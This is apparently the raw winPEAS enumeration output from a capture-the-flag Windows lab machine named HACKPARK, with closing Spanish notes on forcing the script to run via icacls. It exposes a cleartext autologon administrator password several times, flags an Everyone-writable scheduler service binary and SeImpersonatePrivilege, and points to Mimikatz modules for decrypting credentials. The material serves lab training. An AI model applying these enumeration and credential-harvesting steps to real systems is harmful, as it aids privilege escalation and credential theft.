C:\Program Files\Amazon\Ec2ConfigService\Ec2ConfigMonitor.log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2ConfigServiceSettings.exe.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2Runas.exe.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2WallpaperInfo.exe.config
C:\Program Files\Amazon\Ec2ConfigService\log4net.config
C:\Program Files\Amazon\Ec2ConfigService\ScramblePassword.exe.config
C:\Program Files\Amazon\Ec2ConfigService\Plugins\log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ssm\log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ssm\Packages\AWS.EC2.Windows.CloudWatch.Configuration.dll
C:\Program Files\Amazon\Ec2ConfigService\Ssm\Packages\log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ssm\Packages\Microsoft.Practices.Unity.Configuration.dll
C:\Program Files\Amazon\Ec2ConfigService\Ssm\Packages\Microsoft.Practices.Unity.Interception.Configuration.dll
C:\Program Files\Amazon\SSM\Plugins\awsCloudWatch\AWS.CloudWatch.exe.config
C:\Program Files\Amazon\SSM\Plugins\awsCloudWatch\AWS.CloudWatch.log4net.config
C:\Program Files\Amazon\SSM\Plugins\awsCloudWatch\AWS.EC2.Windows.CloudWatch.Configuration.dll
C:\Program Files\Amazon\SSM\Plugins\awsCloudWatch\Microsoft.Practices.Unity.Configuration.dll
C:\Program Files\Amazon\SSM\Plugins\awsDomainJoin\AWS.DomainJoin.exe.config
C:\Program Files\Amazon\SSM\Plugins\awsDomainJoin\log4net.config
C:\Program Files\Amazon\Xentools\Installer.exe.config
C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Scripts\Confirm-Password.ps1
C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Scripts\New-RandomPassword.ps1
C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Scripts\Send-AdminCredentials.ps1
C:\ProgramData\Amazon\EC2-Windows\Launch\Settings\Ec2LaunchSettings.exe.config
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Randomize-LocalAdminPassword.ps1
C:\Users\All Users\Amazon\EC2-Windows\Launch\Module\Scripts\Confirm-Password.ps1
C:\Users\All Users\Amazon\EC2-Windows\Launch\Module\Scripts\New-RandomPassword.ps1
C:\Users\All Users\Amazon\EC2-Windows\Launch\Module\Scripts\Send-AdminCredentials.ps1
C:\Users\All Users\Amazon\EC2-Windows\Launch\Settings\Ec2LaunchSettings.exe.config
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Randomize-LocalAdminPassword.ps1
---
Scan complete.
PowerShell v2 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
PowerShellVersion REG_SZ 2.0
PowerShell v5 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine
PowerShellVersion REG_SZ 4.0
Transcriptions Settings:
Module logging settings:
Scriptblog logging settings:
PS default transcript history
Checking PS history file
[+] MOUNTED DISKS
[i] Maybe you find something interesting
Caption
C:
[+] ENVIRONMENT
[i] Interesting information?
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Windows\system32\config\systemprofile\AppData\Roaming
APP_POOL_CONFIG=C:\inetpub\temp\apppools\Blog\Blog.config
APP_POOL_ID=Blog
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=HACKPARK
ComSpec=C:\Windows\system32\cmd.exe
CurrentFolder=C:\Windows\Temp\
CurrentLine= 0x1B[33m[+]0x1B[97m ENVIRONMENT
E=0x1B[
FP_NO_HOST_CHECK=NO
LOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\Local
long=false
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
Percentage=1
PercentageTrack=34
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 79 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4f01
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Windows\TEMP
TMP=C:\Windows\TEMP
USERDOMAIN=WORKGROUP
USERNAME=HACKPARK$
USERPROFILE=C:\Windows\system32\config\systemprofile
windir=C:\Windows
[+] INSTALLED SOFTWARE
[i] Some weird software? Check for vulnerabilities in unknow software installed
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
Amazon
Common Files
Common Files
Internet Explorer
Internet Explorer
Microsoft.NET
SystemScheduler
Windows Mail
Windows Mail
Windows NT
Windows NT
WindowsPowerShell
WindowsPowerShell
InstallLocation REG_SZ C:\Program Files (x86)\SystemScheduler\
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\ProgramData\Amazon\EC2Launch\sysprep\unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2Launch\sysprep\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\setup\Web.config
---
Scan complete.
[+] Remote Desktop Credentials Manager
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager
Looking inside C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\
[+] Unattended files
[+] SAM and SYSTEM backups
[+] McAffee SiteList.xml
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\system32\inetsrv\appcmd.exe exists.
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
LastUsedUsername REG_SZ administrator
DefaultUserName REG_SZ administrator
DefaultPassword REG_SZ 4q6XvFES7Fdxs
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
W3SVC REG_SZ Software\Microsoft\W3SVC\CurrentVersion
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\ProgramData\Amazon\EC2Launch\sysprep\unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2Launch\sysprep\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\setup\Web.config
---
Scan complete.
The request will be processed at a domain controller for domain WORKGROUP.
USER INFORMATION
----------------
User Name SID
================ ==============================================================
iis apppool\blog S-1-5-82-2734256158-3485737692-275298378-1529073857-2789248872
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
[+] USERS
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest jeff
The command completed with one or more errors.
[+] GROUPS
[+] ADMINISTRATORS GROUPS
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
[+] CURRENT LOGGED USERS
[+] Kerberos Tickets
Current LogonId is 0:0x993a6
Cached Tickets: (0)
[+] CURRENT CLIPBOARD
[i] Any passwords inside the clipboard?
[*] SERVICE VULNERABILITIES
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\system32\inetsrv\appcmd.exe exists.
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
LastUsedUsername REG_SZ administrator
DefaultUserName REG_SZ administrator
DefaultPassword REG_SZ 4q6XvFES7Fdxs
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
W3SVC REG_SZ Software\Microsoft\W3SVC\CurrentVersion
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\ProgramData\Amazon\EC2Launch\sysprep\unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2Launch\sysprep\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\setup\Web.config
---
Scan complete.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
C:\Program Files\Amazon\EC2Launch\EC2Launch.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe NT SERVICE\TrustedInstaller:(F)
C:\Program Files\Amazon\XenTools\LiteAgent.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe NT SERVICE\TrustedInstaller:(F)
C:\Windows\SysWow64\perfhost.exe NT SERVICE\TrustedInstaller:(F)
C:\Windows\PSSDNSVC.EXE NT AUTHORITY\SYSTEM:(I)(F)
C:\Windows\servicing\TrustedInstaller.exe NT SERVICE\TrustedInstaller:(F)
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(F)
Everyone:(I)(M)
[+] CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
[+] UNQUOTED SERVICE PATHS
[i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
[i] The permissions are also checked and filtered using icacls
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
aspnet_state
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe NT SERVICE\TrustedInstaller:(F)
AWSLiteAgent
C:\Program Files\Amazon\XenTools\LiteAgent.exe
NetTcpPortSharing
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe NT SERVICE\TrustedInstaller:(F)
PerfHost
C:\Windows\SysWow64\perfhost.exe
C:\Windows\SysWow64\perfhost.exe NT SERVICE\TrustedInstaller:(F)
PsShutdownSvc
C:\Windows\PSSDNSVC.EXE
C:\Windows\PSSDNSVC.EXE NT AUTHORITY\SYSTEM:(I)(F)
TrustedInstaller
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe NT SERVICE\TrustedInstaller:(F)
WindowsScheduler
C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(F)
Everyone:(I)(M)
[*] DLL HIJACKING in PATHenv variable
[i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
[i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
C:\Windows\system32 NT SERVICE\TrustedInstaller:(F)
C:\Windows NT SERVICE\TrustedInstaller:(F)
C:\Windows\System32\Wbem NT SERVICE\TrustedInstaller:(F)
[*] CREDENTIALS
[+] WINDOWS VAULT
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-vault
Currently stored credentials:
* NONE *
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
[i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
Looking inside C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Credentials\
Looking inside C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\
[+] Unattended files
[+] SAM and SYSTEM backups
[+] McAffee SiteList.xml
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\system32\inetsrv\appcmd.exe exists.
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
LastUsedUsername REG_SZ administrator
DefaultUserName REG_SZ administrator
DefaultPassword REG_SZ 4q6XvFES7Fdxs
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
W3SVC REG_SZ Software\Microsoft\W3SVC\CurrentVersion
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\ProgramData\Amazon\EC2Launch\sysprep\unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2Launch\sysprep\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\setup\Web.config
---
Scan complete.
NO FUNCIONO BIEN WINPEAS VAMSO A DARLE PERMISOS FULL:
icacls winPEAS.bat /grant Everyone:(RX)
icacls winPEAS.bat /grant Everyone:F
PROBAMOS WINPEAS DE VARIAS FORMAS DANDO PERMISOOS PERO FUNCIONA A MEDIAS; ASI QCONSEGUIMOS LA FECHA DE INSTALACION CON UNCOMANDO MAS DIRECTO; DADO QEU EN LOS FOROS TAMBIEN TODOS TUVIERON EL MISMO PROBLEMA:
c:\windows\system32\inetsrv>systeminfo | findstr /i date
Original Install Date: 8/3/2019, 10:43:23 AM
Last updated